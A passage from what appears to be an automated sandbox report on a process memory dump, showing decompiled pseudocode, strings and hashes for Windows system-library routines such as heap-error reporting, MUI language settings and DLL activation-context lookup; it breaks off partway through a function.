                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                      • API String ID: 0-108210295
                                      • Opcode ID: f985dc243869a9181e417d66c955fc94b14c99895f68a8ff9f36b4984886b829
                                      • Instruction ID: 8b1710fc9002b066fb7beb8b4aa0106ecffa7b788075fc3db450628f8bff5d05
                                      • Opcode Fuzzy Hash: f985dc243869a9181e417d66c955fc94b14c99895f68a8ff9f36b4984886b829
                                      • Instruction Fuzzy Hash: AA81C279B40210FFCF29DE459C89DAE3F3AEF4BA61B444058F5062F112D3A29491DBB2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03781C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E03781C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x36a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x37b589c);
				E036CB150("Heap error detected at %p (heap handle %p)\n",  *0x37b58a0);
				_t27 =  *0x37b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03781E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E036CB150("Error code: %d - %s\n",  *0x37b5898);
				_t113 =  *0x37b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter1: %p\n",  *0x37b58a4);
				}
				_t115 =  *0x37b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter2: %p\n",  *0x37b58a8);
				}
				_t117 =  *0x37b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter3: %p\n",  *0x37b58ac);
				}
				_t119 =  *0x37b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x37b58b4);
					E036CB150("Last known valid blocks: before - %p, after - %p\n",  *0x37b58b0);
				} else {
					_t120 =  *0x37b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E036CB150("Stack trace available at %p\n", 0x37b58c0);
			}











                                      0x03781c10
                                      0x03781c16
                                      0x03781c1e
                                      0x03781c3d
                                      0x03781c3e
                                      0x03781c20
                                      0x03781c35
                                      0x03781c3a
                                      0x03781c44
                                      0x03781c55
                                      0x03781c5a
                                      0x03781c65
                                      0x03781c67
                                      0x00000000
                                      0x03781c6e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03781c67
                                      0x03781cdc
                                      0x03781ce5
                                      0x03781d04
                                      0x03781d05
                                      0x03781ce7
                                      0x03781cfc
                                      0x03781d01
                                      0x03781d0b
                                      0x03781d17
                                      0x03781d1f
                                      0x03781d25
                                      0x03781d30
                                      0x03781d4f
                                      0x03781d50
                                      0x03781d32
                                      0x03781d47
                                      0x03781d4c
                                      0x03781d61
                                      0x03781d67
                                      0x03781d68
                                      0x03781d6e
                                      0x03781d79
                                      0x03781d98
                                      0x03781d99
                                      0x03781d7b
                                      0x03781d90
                                      0x03781d95
                                      0x03781daa
                                      0x03781db0
                                      0x03781db1
                                      0x03781db7
                                      0x03781dc2
                                      0x03781de1
                                      0x03781de2
                                      0x03781dc4
                                      0x03781dd9
                                      0x03781dde
                                      0x03781df3
                                      0x03781df9
                                      0x03781dfa
                                      0x03781e00
                                      0x03781e0a
                                      0x03781e13
                                      0x03781e32
                                      0x03781e33
                                      0x03781e15
                                      0x03781e2a
                                      0x03781e2f
                                      0x03781e39
                                      0x03781e4a
                                      0x03781e02
                                      0x03781e02
                                      0x03781e08
                                      0x00000000
                                      0x00000000
                                      0x03781e08
                                      0x03781e5b
                                      0x03781e7a
                                      0x03781e7b
                                      0x03781e5d
                                      0x03781e72
                                      0x03781e77
                                      0x03781e95

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                      • API String ID: 0-2897834094
                                      • Opcode ID: 86568a3eff7bfcbca861b5fa3f964a863a48395379863e66cc8988e7c2efb4bc
                                      • Instruction ID: 6545045d8afdfa5dc458bd89139781d93465001905702d42b365c318fb90a1c6
                                      • Opcode Fuzzy Hash: 86568a3eff7bfcbca861b5fa3f964a863a48395379863e66cc8988e7c2efb4bc
                                      • Instruction Fuzzy Hash: 8F6162366A1684DFC211FB84E48AE7477F8EB04931B4D806EF40B6F611E6759C829F1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E036D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E036D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E036D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E036D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E036D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E036D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L036E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0370F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03711370(_t276, 0x36a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0370BB40(0,  &_v68, _t170);
									if(L036D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0370BB40(_t257,  &_v68, _t243);
								if(L036D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03711370(_t278, 0x36a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L036E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0370F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03711370(_v16, 0x36a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0370BB40(_t262,  &_v68, _t244);
								if(L036D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03711370(_t282, 0x36a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0370BB40(_t262,  &_v68, _t201);
							if(L036D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L036E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0370F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03711370(_t280, 0x36a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0370BB40(_t267,  &_v68, _t245);
							if(L036D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03711370(_t284, 0x36a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0370BB40(_t267,  &_v68, _t224);
						if(L036D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                      0x036d3d3c
                                      0x036d3d42
                                      0x036d3d44
                                      0x036d3d46
                                      0x036d3d49
                                      0x036d3d4c
                                      0x036d3d4f
                                      0x036d3d52
                                      0x036d3d55
                                      0x036d3d58
                                      0x036d3d5b
                                      0x036d3d5f
                                      0x036d3d61
                                      0x036d3d66
                                      0x03728213
                                      0x03728218
                                      0x036d4085
                                      0x036d4088
                                      0x036d408e
                                      0x036d4094
                                      0x036d409a
                                      0x036d40a0
                                      0x036d40a6
                                      0x036d40a9
                                      0x036d40af
                                      0x036d40b6
                                      0x036d40bd
                                      0x036d40bd
                                      0x036d3d83
                                      0x0372821f
                                      0x03728229
                                      0x03728238
                                      0x03728238
                                      0x0372823d
                                      0x0372823d
                                      0x036d3da0
                                      0x036d3daf
                                      0x036d3db5
                                      0x036d3dba
                                      0x036d3dba
                                      0x036d3dd4
                                      0x036d3e94
                                      0x036d3eab
                                      0x036d3f6d
                                      0x036d3f84
                                      0x036d406b
                                      0x036d406b
                                      0x036d406e
                                      0x036d406e
                                      0x036d4070
                                      0x036d4074
                                      0x03728351
                                      0x03728351
                                      0x036d407a
                                      0x036d407f
                                      0x0372835d
                                      0x03728370
                                      0x03728377
                                      0x03728379
                                      0x0372837c
                                      0x0372837c
                                      0x0372835d
                                      0x00000000
                                      0x036d407f
                                      0x036d3f8a
                                      0x036d3f8d
                                      0x036d3f90
                                      0x036d3f95
                                      0x0372830d
                                      0x0372830f
                                      0x036d3f9b
                                      0x036d3fac
                                      0x036d3fae
                                      0x036d3fb1
                                      0x036d3fb1
                                      0x036d3fb6
                                      0x03728317
                                      0x0372831a
                                      0x00000000
                                      0x036d3fbc
                                      0x036d3fc1
                                      0x036d3fc9
                                      0x036d3fd7
                                      0x036d3fda
                                      0x036d3fdd
                                      0x036d4021
                                      0x036d4021
                                      0x036d4029
                                      0x036d4030
                                      0x036d4044
                                      0x036d4046
                                      0x036d4046
                                      0x036d4044
                                      0x036d4049
                                      0x03728327
                                      0x03728334
                                      0x03728339
                                      0x0372833c
                                      0x036d404f
                                      0x036d404f
                                      0x036d404f
                                      0x036d4051
                                      0x036d4056
                                      0x036d4063
                                      0x036d4063
                                      0x036d4068
                                      0x00000000
                                      0x036d4068
                                      0x036d3fdf
                                      0x036d3fe2
                                      0x036d3fe4
                                      0x036d3fe7
                                      0x036d3fef
                                      0x036d4003
                                      0x036d4005
                                      0x036d4005
                                      0x036d400c
                                      0x036d4013
                                      0x036d4016
                                      0x036d4017
                                      0x036d401b
                                      0x036d401e
                                      0x00000000
                                      0x036d401e
                                      0x036d3fb6
                                      0x036d3eb1
                                      0x036d3eb4
                                      0x036d3eb7
                                      0x036d3ebc
                                      0x037282a9
                                      0x037282ab
                                      0x036d3ec2
                                      0x036d3ed3
                                      0x036d3ed5
                                      0x036d3ed8
                                      0x036d3ed8
                                      0x036d3edd
                                      0x037282b3
                                      0x037282b6
                                      0x00000000
                                      0x036d3ee3
                                      0x036d3ee8
                                      0x036d3eed
                                      0x036d3ef0
                                      0x036d3ef3
                                      0x036d3f02
                                      0x036d3f05
                                      0x036d3f08
                                      0x037282c0
                                      0x037282c3
                                      0x037282c5
                                      0x037282c8
                                      0x037282d0
                                      0x037282e4
                                      0x037282e6
                                      0x037282e6
                                      0x037282ed
                                      0x037282f4
                                      0x037282f7
                                      0x037282f8
                                      0x037282fc
                                      0x037282ff
                                      0x037282ff
                                      0x036d3f0e
                                      0x036d3f11
                                      0x036d3f16
                                      0x036d3f1d
                                      0x036d3f31
                                      0x03728307
                                      0x03728307
                                      0x036d3f31
                                      0x036d3f39
                                      0x036d3f48
                                      0x036d3f4d
                                      0x036d3f50
                                      0x036d3f50
                                      0x036d3f53
                                      0x036d3f58
                                      0x036d3f65
                                      0x036d3f65
                                      0x036d3f6a
                                      0x00000000
                                      0x036d3f6a
                                      0x036d3edd
                                      0x036d3dda
                                      0x036d3ddd
                                      0x036d3de0
                                      0x036d3de5
                                      0x03728245
                                      0x036d3deb
                                      0x036d3df7
                                      0x036d3dfc
                                      0x036d3dfe
                                      0x036d3e01
                                      0x036d3e01
                                      0x036d3e06
                                      0x0372824d
                                      0x0372824f
                                      0x03728254
                                      0x00000000
                                      0x036d3e0c
                                      0x036d3e11
                                      0x036d3e16
                                      0x036d3e19
                                      0x036d3e29
                                      0x036d3e2c
                                      0x036d3e2f
                                      0x0372825c
                                      0x0372825f
                                      0x03728261
                                      0x03728264
                                      0x0372826c
                                      0x03728280
                                      0x03728282
                                      0x03728282
                                      0x03728289
                                      0x03728290
                                      0x03728293
                                      0x03728294
                                      0x03728298
                                      0x0372829b
                                      0x0372829b
                                      0x036d3e35
                                      0x036d3e38
                                      0x036d3e3d
                                      0x036d3e44
                                      0x036d3e58
                                      0x037282a3
                                      0x037282a3
                                      0x036d3e58
                                      0x036d3e60
                                      0x036d3e6f
                                      0x036d3e74
                                      0x036d3e77
                                      0x036d3e77
                                      0x036d3e7a
                                      0x036d3e7f
                                      0x036d3e8c
                                      0x036d3e8c
                                      0x036d3e91
                                      0x00000000
                                      0x036d3e91

                                      Strings
                                      • Kernel-MUI-Language-Disallowed, xrefs: 036D3E97
                                      • Kernel-MUI-Language-Allowed, xrefs: 036D3DC0
                                      • WindowsExcludedProcs, xrefs: 036D3D6F
                                      • Kernel-MUI-Language-SKU, xrefs: 036D3F70
                                      • Kernel-MUI-Number-Allowed, xrefs: 036D3D8C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      • Opcode ID: 7a506f81fc3f58db401c0d0f7ef578a13ced8657f1794b9e7fe3a03e0470e7c8
                                      • Instruction ID: d8d006f505d23e7e7e8af143b182d7319ffa3062ed563e678b144b141c74be2d
                                      • Opcode Fuzzy Hash: 7a506f81fc3f58db401c0d0f7ef578a13ced8657f1794b9e7fe3a03e0470e7c8
                                      • Instruction Fuzzy Hash: FCF14C76D01618EFCB12DF99D980AEEBBF9FF08650F15006AE505AB350DB719E01CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E036F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x37bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x37b8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x37b5780 & 0x00000003) != 0) {
							E03745510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x37b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0370B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x37b7984; // 0x2e82ac0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x37b8464; // 0x74b10110
					 *0x37bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E036F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x37b5780 & 0x00000005) != 0) {
						_push(_t49);
						E03745510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                      0x036f8e0f
                                      0x036f8e16
                                      0x036f8e19
                                      0x036f8e1b
                                      0x036f8e21
                                      0x036f8e7f
                                      0x036f8e85
                                      0x03739354
                                      0x0373936c
                                      0x03739371
                                      0x0373937b
                                      0x03739381
                                      0x03739381
                                      0x0373937b
                                      0x036f8e9d
                                      0x036f8e9d
                                      0x036f8e29
                                      0x036f8e2c
                                      0x036f8e38
                                      0x036f8e3e
                                      0x036f8e43
                                      0x036f8eb5
                                      0x036f8eb9
                                      0x037392aa
                                      0x037392af
                                      0x037392e8
                                      0x037392e8
                                      0x037392af
                                      0x036f8eb9
                                      0x036f8e45
                                      0x036f8e53
                                      0x036f8e5b
                                      0x036f8e5f
                                      0x036f8e78
                                      0x036f8e78
                                      0x036f8e7d
                                      0x036f8ec3
                                      0x036f8ecd
                                      0x036f8ed2
                                      0x036f8ed2
                                      0x036f8ec5
                                      0x036f8ec5
                                      0x00000000
                                      0x036f8e7d
                                      0x036f8e67
                                      0x036f8ea4
                                      0x0373931a
                                      0x00000000
                                      0x00000000
                                      0x03739320
                                      0x036f8ea4
                                      0x036f8e70
                                      0x03739325
                                      0x03739340
                                      0x03739345
                                      0x03739345
                                      0x036f8e76
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Strings
                                      • LdrpFindDllActivationContext, xrefs: 03739331, 0373935D
                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0373932A
                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 03739357
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0373933B, 03739367
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-3779518884
                                      • Opcode ID: b7b9edc028c2d057f812bee79d84f84bbe85c39aaafcdff134a714663128c618
                                      • Instruction ID: c92ef2cd1cdc72182fb8f4eb0d75ebd59cc4b4cadb0409d89f228a84aba0951a
                                      • Opcode Fuzzy Hash: b7b9edc028c2d057f812bee79d84f84bbe85c39aaafcdff134a714663128c618
                                      • Instruction Fuzzy Hash: 7A412A32B003159FDB35EA18CD4DB79B6B9BB4625CF0D81E9DB1457252E770AC80C683
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E036D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
